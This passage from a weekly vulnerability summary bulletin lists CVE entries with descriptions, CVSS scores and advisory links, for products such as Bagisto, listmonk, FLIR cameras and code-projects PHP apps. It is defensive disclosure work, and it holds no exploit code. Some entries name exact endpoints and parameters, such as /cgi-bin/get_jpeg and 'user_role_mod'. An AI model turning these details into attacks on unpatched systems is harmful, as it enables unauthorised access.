| bagisto--bagisto | Bagisto is an open source Laravel eCommerce platform. In versions on the 2.3 branch prior to 2.3.10, installer API routes remain active even after initial installation is complete. The underlying API endpoints (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. This allows any unauthenticated attacker to create admin accounts, modify application configurations, and potentially overwrite existing data. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21446 | https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed |
| bagisto--bagisto | Bagisto is an open source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection. When a normal customer orders any product, in the `add address` step they can inject a value that is rendered in the admin view. The issue can lead to remote code execution. Version 2.3.10 contains a patch. | 2026-01-02 | not yet calculated | CVE-2026-21448 | https://github.com/bagisto/bagisto/security/advisories/GHSA-5j4h-4f72-qpm6 |
| bagisto--bagisto | Bagisto is an open source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via the first name and last name fields from a low-privilege user. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21449 | https://github.com/bagisto/bagisto/security/advisories/GHSA-mqhg-v22x-pqj8 |
| bagisto--bagisto | Bagisto is an open source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via the type parameter, which can lead to remote code execution or other exploitation. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21450 | https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp |
| bagisto--bagisto | Bagisto is an open source Laravel eCommerce platform. A stored Cross-Site Scripting (XSS) vulnerability exists in Bagisto prior to version 2.3.10 within the CMS page editor. Although the platform normally attempts to sanitize `<script>` tags, the filtering can be bypassed by manipulating the raw HTTP POST request before submission. As a result, arbitrary JavaScript can be stored in the CMS content and executed whenever the page is viewed or edited. This exposes administrators to a high-severity risk, including complete account takeover, backend hijacking, and malicious script execution. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21451 | https://github.com/bagisto/bagisto/security/advisories/GHSA-2mwc-h2mg-v6p8 |
| knadh--listmonk | listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, a lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims only need to visit a link; no preview click is required. Version 6.0.0 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21483 | https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565 |
Vulnerability Summary for the Week of December 22, 2025
Posted on Monday December 29, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 9786--phpok3w | A vulnerability was identified in 9786 phpok3w up to 901d96a06809fb28b17f3a4362c59e70411c933c. Impacted is an unknown function of the file show.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 7.3 | CVE-2025-15142 | VDB-338520 \| 9786 phpok3w show.php sql injection VDB-338520 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715574 \| phpok3w 1.0 SQL Injection https://gitee.com/9786/phpok3w/issues/IDD1IZ |
| Alteryx--Server | A vulnerability was found in Alteryx Server. Affected by this issue is some unknown functionality of the file /gallery/api/status/. Performing manipulation results in improper authentication. The attack can be carried out remotely. The exploit has been made public and could be used. Upgrading to version 2023.1.1.13.486, 2023.2.1.10.293, 2024.1.1.9.236, 2024.2.1.6.125 or 2025.1.1.1.31 can resolve this issue. Upgrading the affected component is recommended. | 2025-12-26 | 7.3 | CVE-2025-15097 | VDB-338428 \| Alteryx Server status improper authentication VDB-338428 \| CTI Indicators (IOB, IOC, IOA) Submit #710169 \| Alteryx Alteryx Server 2020/2021/2022/2023/2024/2025 Authentication Bypass Issues https://ict-strypes.eu/wp-content/uploads/2025/12/Alteryx-Second-Research.pdf https://gist.github.com/apostolovd/f84631eed2f0c0e83e2e174b1480f08c https://help.alteryx.com/release-notes/en/release-notes/server-release-notes/server-2025-1-release-notes.html |
| Anviz Biometric Technology Co., Ltd.--Anviz AIM CrossChex Standard | Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data. | 2025-12-24 | 9.8 | CVE-2018-25135 | ExploitDB-45765 Anviz Biometric Technology Product Homepage Zero Science Lab Disclosure (ZSL-2018-5498) |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'duplicate_wpml_layout' function in all versions up to, and including, 2.9.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary posts with the content of other existing posts, potentially exposing private and password-protected content and deleting any content that is not saved in revisions or backups. Posts must have been created with Beaver Builder to be copied or updated. | 2025-12-23 | 8.1 | CVE-2025-12934 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc2db74d-61b9-498a-a0d8-e43466b06f37?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-builder-model.php#L181 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-builder-model.php#L5490 https://plugins.trac.wordpress.org/changeset/3425646/beaver-builder-lite-version/trunk |
| Beward R&D Co., Ltd--N100 H.264 VGA IP Camera | Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability that allows attackers to read arbitrary system files via the 'READ.filePath' parameter. Attackers can exploit the fileread script or SendCGICMD API to access sensitive files like /etc/passwd and /etc/issue by supplying absolute file paths. | 2025-12-24 | 8.8 | CVE-2019-25246 | ExploitDB-46320 Beward Product Homepage Zero Science Lab Disclosure (ZSL-2019-5511) |
| Beward--N100 H.264 VGA IP Camera | Beward N100 M2.1.6.04C014 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve the camera's RTSP stream by exploiting the lack of authentication in the video access mechanism. | 2025-12-24 | 7.5 | CVE-2019-25248 | ExploitDB-46317 Beward Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5509) |
| Centreon--Infra Monitoring - Open-tickets | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring - Open-tickets (Notification rules configuration parameters, Open tickets modules) allows SQL Injection to a user with elevated privileges. This issue affects Infra Monitoring - Open-tickets: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4. | 2025-12-22 | 7.2 | CVE-2025-12514 | https://github.com/centreon/centreon/releases |
| CMSimple--CMSimple | CMSimple 5.2 contains a stored cross-site scripting vulnerability in the Filebrowser External input field that allows attackers to inject malicious JavaScript. Attackers can place unfiltered JavaScript code that executes when users click on Page or Files tabs, enabling persistent script injection. | 2025-12-23 | 7.2 | CVE-2021-47732 | ExploitDB-49751 Official CMSimple Vendor Homepage VulnCheck Advisory: CMSimple 5.2 Stored Cross-Site Scripting via Filebrowser External Input |
| Cmsimple--Cmsimple | CMSimple 5.4 contains an authenticated remote code execution vulnerability that allows logged-in attackers to inject malicious PHP code into template files. Attackers can exploit the template editing functionality by crafting a reverse shell payload and saving it through the template editing endpoint with a valid CSRF token. | 2025-12-23 | 8.8 | CVE-2021-47735 | ExploitDB-50356 Official CMSimple Homepage VulnCheck Advisory: CMSimple 5.4 Authenticated Remote Code Execution via Template Editing |
| Cmsimple-Xh--CMSimple_XH | CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server. | 2025-12-23 | 8.8 | CVE-2021-47736 | ExploitDB-50367 Official Vendor Homepage VulnCheck Advisory: CMSimple_XH 1.7.4 Authenticated Remote Code Execution via Content Editing |
| Cobiansoft--Cobian Backup Gravity | Cobian Backup Gravity 11.2.0.582 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the CobianBackup11 service to inject malicious code that would execute with LocalSystem privileges during service startup. | 2025-12-22 | 8.4 | CVE-2022-50688 | ExploitDB-50791 Cobian Backup Official Vendor Homepage VulnCheck Advisory: Cobian Backup Gravity 11.2.0.582 Unquoted Service Path Privilege Escalation |
| code-projects--Online Farm System | A vulnerability was identified in code-projects Online Farm System 1.0. Affected is an unknown function of the file /addProduct.php. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-23 | 7.3 | CVE-2025-15049 | VDB-337854 \| code-projects Online Farm System addProduct.php sql injection VDB-337854 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721001 \| code-projects Online Farm System V1.0 SQL Injection https://github.com/xiaotsai/tttt/issues/1 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was determined in code-projects Refugee Food Management System 1.0. The affected element is an unknown function of the file /home/home.php. This manipulation of the argument a causes sql injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-22 | 7.3 | CVE-2025-15012 | VDB-337718 \| code-projects Refugee Food Management System home.php sql injection VDB-337718 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #719788 \| Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr17/issues/2 https://code-projects.org/ |
| code-projects--Simple Stock System | A vulnerability was found in code-projects Simple Stock System 1.0. Impacted is an unknown function of the file /logout.php. The manipulation of the argument uname results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2025-12-22 | 7.3 | CVE-2025-15011 | VDB-337717 \| code-projects Simple Stock System logout.php sql injection VDB-337717 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #719663 \| Code-projects Simple Stock System v1.0 SQL Injection https://github.com/chunmingshanan/CVE/issues/1 https://code-projects.org/ |
| code-projects--Student Information System | A flaw has been found in code-projects Student Information System 1.0. This issue affects some unknown processing of the file /searchresults.php. Manipulation of the argument searchbox can lead to sql injection. The attack may be performed remotely. The exploit has been published and may be used. | 2025-12-24 | 7.3 | CVE-2025-15053 | VDB-337859 \| code-projects Student Information System searchresults.php sql injection VDB-337859 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #720796 \| Fabian Ros Student Information System In PHP With Source Code November 2, 2025 SQL Injection https://github.com/i4G5d/CRITICAL-SEVERITY-VULNERABILITY-REPORT-Widespread-SQLI https://code-projects.org/ |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodexThemes TheGem Theme Elements (for Elementor). This issue affects TheGem Theme Elements (for Elementor): from n/a through 5.10.5.1. | 2025-12-23 | 7.5 | CVE-2025-68560 | https://vdp.patchstack.com/database/wordpress/plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-local-file-inclusion-vulnerability?_s_id=cve |
| D-Link--DSL-124 Wireless N300 ADSL2+ | D-Link DSL-124 ME_1.00 contains a configuration file disclosure vulnerability that allows unauthenticated attackers to retrieve router settings through a POST request. Attackers can send a specific POST request to the router's configuration endpoint to download a complete backup file containing sensitive network credentials and system configurations. | 2025-12-22 | 7.5 | CVE-2023-53974 | ExploitDB-51129 D-Link Official Homepage D-Link MEA Product Details Page VulnCheck Advisory: D-Link DSL-124 ME_1.00 Backup Configuration File Disclosure via Unauthenticated Request |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C Firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to remove user accounts without proper authentication. | 2025-12-22 | 9.8 | CVE-2023-53968 | ExploitDB-51457 DB Elettronica Telecomunicazioni Official Website SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5773) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Erase Account |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C firmware 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without requiring the current credentials. Attackers can exploit the userManager.cgx API endpoint by sending a crafted POST request with a new MD5-hashed password to directly modify the admin account's authentication. | 2025-12-22 | 7.5 | CVE-2023-53967 | ExploitDB-51458 DB Elettronica Telecomunicazioni SpA Homepage SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5774) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Admin Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication. | 2025-12-22 | 7.5 | CVE-2023-53969 | ExploitDB-51456 DB Elettronica Telecomunicazioni Official Website SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5772) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C Firmware 1.9.3 contains a weak session management vulnerability that allows attackers to bypass authentication controls by reusing IP-bound session identifiers. Attackers can exploit the vulnerable deviceManagement API endpoint to reset device configurations by sending crafted POST requests with manipulated session parameters. | 2025-12-22 | 7.5 | CVE-2023-53970 | ExploitDB-51459 DB Elettronica Telecomunicazioni Product Homepage SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5775) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Reset Board Config |
| devolo AG--dLAN 550 duo+ Starter Kit | devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters. | 2025-12-24 | 9.8 | CVE-2019-25249 | ExploitDB-46325 Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2019-5508) |
| Eaton--Eaton UPS Companion Software | Improper authentication of library files in the Eaton UPS Companion software installer could lead to arbitrary code execution by an attacker with access to the software package. This security issue has been fixed in the latest version of EUC, which is available on the Eaton download center. | 2025-12-26 | 8.6 | CVE-2025-59887 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1026.pdf |
| Eaton--Eaton xComfort ECI | Improper input validation at one of the endpoints of Eaton xComfort ECI's web interface could allow an attacker with network access to the device to execute privileged user commands. As cybersecurity standards continue to evolve and to meet our requirements today, Eaton has decided to discontinue the product. Upon retirement or end of support, there will be no new security updates, non-security updates, paid assisted support options, or online technical content updates. | 2025-12-23 | 8.8 | CVE-2025-59886 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1022.pdf |
| Eaton--UPS Companion software | Due to insecure library loading in the Eaton UPS Companion software executable, an attacker with access to the software package could achieve arbitrary code execution. This security issue has been fixed in the latest version of EUC, which is available on the Eaton download center. | 2025-12-26 | 7.8 | CVE-2025-67450 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1027.pdf |
| Echo Call Center Services Trade and Industry Inc.--Specto CM | Unrestricted Upload of File with Dangerous Type vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Remote Code Inclusion. This issue affects Specto CM: before 17032025. | 2025-12-24 | 8.8 | CVE-2025-2155 | https://www.usom.gov.tr/bildirim/tr-25-0480 |
| Eclipse Foundation--BlueChi | A vulnerability was found in BlueChi, a multi-node systemd service controller used in RHIVOS. This flaw allows a user with root privileges on a managed node (qm) to create or override systemd service unit files that affect the host node. This issue can lead to privilege escalation, unauthorized service execution, and potential system compromise. | 2025-12-24 | 7.2 | CVE-2025-2515 | https://access.redhat.com/security/cve/CVE-2025-2515 RHBZ#2353313 https://github.com/eclipse-bluechi/bluechi/commit/fe0d28301ce2bd45f0b1d8a98a94efef799fbc73#diff-64140c83db42a8888f346a40de293b80f79ebf7d75ce4137b22567e360bce607 https://github.com/eclipse-bluechi/bluechi/issues/1069 https://github.com/eclipse-bluechi/bluechi/pull/1073 |
| Epic Games--Easy Anti-Cheat | Epic Games Easy Anti-Cheat 4.0 contains an unquoted service path vulnerability that allows local non-privileged users to execute arbitrary code with elevated system privileges. Attackers can exploit the service configuration by inserting malicious code in the system root path that would execute with LocalSystem privileges during application startup. | 2025-12-23 | 8.4 | CVE-2021-47739 | ExploitDB-49841 Epic Games Official Website Easy Anti-Cheat Official Website Zero Science Lab Disclosure (ZSL-2021-5652) VulnCheck Advisory: Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation via Unquoted Service Path |
| FantasticLBP--Hotels_Server | A security vulnerability has been detected in FantasticLBP Hotels_Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. Affected by this issue is some unknown functionality of the file /controller/api/Room.php. Such manipulation of the argument hotelId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 7.3 | CVE-2025-15127 | VDB-338505 \| FantasticLBP Hotels_Server Room.php sql injection VDB-338505 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #711809 \| Github Hotels_Server v1.0 SQL Injection https://github.com/liangmingpku/CVE/issues/1 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2. | 2025-12-22 | 7.5 | CVE-2025-68475 | https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93 https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779 https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a https://github.com/fedify-dev/fedify/releases/tag/1.6.13 https://github.com/fedify-dev/fedify/releases/tag/1.7.14 https://github.com/fedify-dev/fedify/releases/tag/1.8.15 https://github.com/fedify-dev/fedify/releases/tag/1.9.2 |
| FLIR Systems, Inc.--Brickstream 3D+ | FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can retrieve video stream images by directly accessing multiple image endpoints like middleImage.jpg, rightimage.jpg, and leftimage.jpg. | 2025-12-24 | 7.5 | CVE-2018-25136 | ExploitDB-45607 FLIR Brickstream Product Homepage Zero Science Lab Disclosure (ZSL-2018-5496) |
| FLIR Systems, Inc.--FLIR AX8 Thermal Camera | FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage. | 2025-12-24 | 7.5 | CVE-2018-25139 | ExploitDB-45606 FLIR Systems Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5492) |
| FLIR Systems, Inc.--FLIR Brickstream 3D+ | FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability in the ExportConfig REST API that allows attackers to download sensitive configuration files. Attackers can exploit the getConfigExportFile.cgi endpoint to retrieve system configurations, potentially enabling authentication bypass and privilege escalation. | 2025-12-24 | 7.5 | CVE-2018-25137 | ExploitDB-45599 FLIR Brickstream Product Homepage Zero Science Lab Disclosure (ZSL-2018-5495) |
| FLIR Systems, Inc.--Thermal Traffic Cameras | FLIR thermal traffic cameras contain an unauthenticated device manipulation vulnerability in their WebSocket implementation that allows attackers to bypass authentication and authorization controls. Attackers can directly modify device configurations, access system information, and potentially initiate denial of service by sending crafted WebSocket messages without authentication. | 2025-12-24 | 7.5 | CVE-2018-25140 | ExploitDB-45539 FLIR Systems Official Website Zero Science Lab Disclosure (ZSL-2018-5490) |
| FLIR Systems--FLIR AX8 Thermal Camera | FLIR AX8 Thermal Camera 1.32.16 contains hard-coded SSH and web panel credentials that cannot be changed through normal camera operations. Attackers can exploit these persistent credentials to gain unauthorized shell access and login to multiple camera interfaces using predefined username and password combinations. | 2025-12-24 | 7.5 | CVE-2018-25138 | ExploitDB-45629 FLIR Systems Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5494) |
| FLIR--FLIR Thermal Traffic Cameras | FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication. | 2025-12-24 | 7.5 | CVE-2018-25141 | ExploitDB-45537 FLIR Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2018-5489) |
| FluidSynth--fluidsynth | FluidSynth is a software synthesizer based on the SoundFont 2 specifications. In versions 2.5.0 up to but not including 2.5.2, a race condition during unloading of a DLS file can trigger a heap-based use-after-free. A concurrently running thread may be pending to unload a DLS file, leading to use of freed memory if the synthesizer is being concurrently destroyed or samples of the (unloaded) DLS file are concurrently used to synthesize audio. This issue has been patched in version 2.5.2. The problem will not occur when explicitly unloading a DLS file (before synth destruction), provided that at the time of unloading no samples of the respective file are used by active voices. The problem will not occur in versions of FluidSynth that have been compiled without native DLS support. | 2025-12-23 | 7 | CVE-2025-68617 | https://github.com/FluidSynth/fluidsynth/security/advisories/GHSA-ffw2-xvvp-39ch https://github.com/FluidSynth/fluidsynth/issues/1717 https://github.com/FluidSynth/fluidsynth/issues/1728 https://github.com/FluidSynth/fluidsynth/commit/685e54cdc44911ace31774260bd0c9ec89887491 https://github.com/FluidSynth/fluidsynth/commit/962b9946b5cb6b16f0c08b89dd1b7016d4fce886 |
| FreyrSCADA--IEC-60870-5-104 | FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences. | 2025-12-23 | 7.5 | CVE-2024-9684 | https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6 https://drive.google.com/drive/folders/1pBPZR59d_rlixH7ZysUmmbOEZvjZV9g1 |
| Gitea--Gitea | Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API. | 2025-12-26 | 8.2 | CVE-2025-68939 | https://blog.gitea.com/release-of-1.23.0/ https://github.com/go-gitea/gitea/releases/tag/v1.23.0 https://github.com/go-gitea/gitea/pull/32151 |
| GnuPG--GnuPG | In GnuPG through 2.4.8, armor_filter in g10/armor.c has two increments of an index variable where one is intended, leading to an out-of-bounds write for crafted input. | 2025-12-28 | 7.8 | CVE-2025-68973 | https://gpg.fail/memcpy https://news.ycombinator.com/item?id=46403200 https://www.openwall.com/lists/oss-security/2025/12/28/5 https://github.com/gpg/gnupg/commit/115d138ba599328005c5321c0ef9f00355838ca9 https://github.com/gpg/gnupg/blob/ff30683418695f5d2cc9e6cf8c9418e09378ebe4/g10/armor.c#L1305-L1306 |
| Guangzhou V-SOLUTION Electronic Technology Co., Ltd.--SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains a privilege escalation vulnerability that allows normal users to gain administrative access by manipulating the user role parameter. Attackers can send a crafted HTTP POST request to the user management endpoint with 'user_role_mod' set to integer value '1' to elevate their privileges. | 2025-12-24 | 9.8 | CVE-2019-25237 | ExploitDB-47435 V-SOL Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5538) |
| Guangzhou V-SOLUTION Electronic Technology--GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform 2.03 contains an unauthenticated information disclosure vulnerability that allows attackers to download configuration files via direct object reference. Attackers can retrieve sensitive configuration data by sending HTTP GET requests to the usrcfg.conf endpoint, potentially enabling authentication bypass and system access. | 2025-12-24 | 7.5 | CVE-2019-25239 | ExploitDB-47433 V-SOL Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5534) |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint. | 2025-12-22 | 7.5 | CVE-2021-47713 | ExploitDB-49789 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Denial of Service via Malicious GraphQL Query |
| Hitachi--Hitachi Infrastructure Analytics Advisor | Cross-site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component). This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00. | 2025-12-24 | 8.2 | CVE-2025-66444 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-133/index.html |
| Hitachi--Hitachi Infrastructure Analytics Advisor | Authorization bypass vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component). This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00. | 2025-12-24 | 7.1 | CVE-2025-66445 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-133/index.html |
| Hotech Software Inc.--Otello | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hotech Software Inc. Otello allows Stored XSS. This issue affects Otello: from 2.4.0 before 2.4.4. | 2025-12-23 | 7.3 | CVE-2025-13183 | https://www.usom.gov.tr/bildirim/tr-25-0476 |
| IBM--API Connect | IBM API Connect 10.0.8.0 through 10.0.8.5, and 10.0.11.0 could allow a remote attacker to bypass authentication mechanisms and gain unauthorized access to the application. | 2025-12-26 | 9.8 | CVE-2025-13915 | https://www.ibm.com/support/pages/node/7255149 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking. A local user could overflow the buffer and execute arbitrary code on the system. | 2025-12-26 | 7.8 | CVE-2025-12771 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a local user to escalate their privileges due to a race condition of a symbolic link. | 2025-12-26 | 7.7 | CVE-2025-64645 | https://www.ibm.com/support/pages/node/7255549 |
| IdeaBox Creations--PowerPack Pro for Elementor | Missing Authorization vulnerability in IdeaBox Creations PowerPack Pro for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PowerPack Pro for Elementor: from n/a through 2.10.6. | 2025-12-23 | 7.5 | CVE-2024-24844 | https://vdp.patchstack.com/database/wordpress/plugin/powerpack-elements/vulnerability/wordpress-powerpack-pro-for-elementor-plugin-2-10-6-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1. | 2025-12-26 | 8.8 | CVE-2025-67729 | https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee |
| iSeeQ--Hybrid DVR WH-H4 | iSeeQ Hybrid DVR WH-H4 1.03R contains an unauthenticated vulnerability in the get_jpeg script that allows unauthorized access to live video streams. Attackers can retrieve video snapshots from specific camera channels by sending requests to the /cgi-bin/get_jpeg endpoint without authentication. | 2025-12-24 | 9.8 | CVE-2019-25236 | ExploitDB-47562 iSeeQ Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5539) |
| itsourcecode--Online Frozen Foods Ordering System | A vulnerability was determined in itsourcecode Online Frozen Foods Ordering System 1.0. It affects an unknown part of the file /contact_us.php. Manipulation of the argument Name leads to SQL injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be used. | 2025-12-24 | 7.3 | CVE-2025-15073 | VDB-338330 (itsourcecode Online Frozen Foods Ordering System contact_us.php SQL injection); VDB-338330 CTI Indicators (IOB, IOC, TTP, IOA); Submit #721321 (itsourcecode Online Frozen Foods Ordering System v1.0 SQL Injection); https://github.com/24ggee/CVE/issues/1 https://itsourcecode.com/ |
